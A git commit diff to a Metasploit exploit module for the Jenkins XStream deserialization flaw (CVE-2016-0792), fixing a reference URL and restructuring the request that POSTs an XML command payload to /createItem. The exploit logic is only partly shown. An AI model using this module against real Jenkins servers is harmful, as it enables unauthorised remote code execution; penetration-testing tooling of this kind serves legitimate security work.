Add get_vars, remove a https instance

2017-11-08 16:30:59 -05:00 · 2017-11-08 16:30:59 -05:00 · a04bc0a25b
parent 7173e7f4b4
commit a04bc0a25b
1 changed files with 8 additions and 5 deletions
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'References'     =>
          [
            ['CVE', '2016-0792'],
-            ['URL', 'https://https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
+            ['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
            ['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413']
          ],
        'Platform'  => %w{ win linux unix },
@ -105,10 +105,13 @@ class MetasploitModule < Msf::Exploit::Remote
    cmd.map! { |arg| arg.encode(xml: :text) }

    res = send_request_cgi(
-      'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, '/createItem?name=random'),
-      'ctype'  => 'application/xml',
-      'data'   => xstream_payload(cmd)
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/createItem'),
+      'vars_get' => {
+              'name' => 'random'
+      },
+      'ctype'    => 'application/xml',
+      'data'     => xstream_payload(cmd)
    )
  end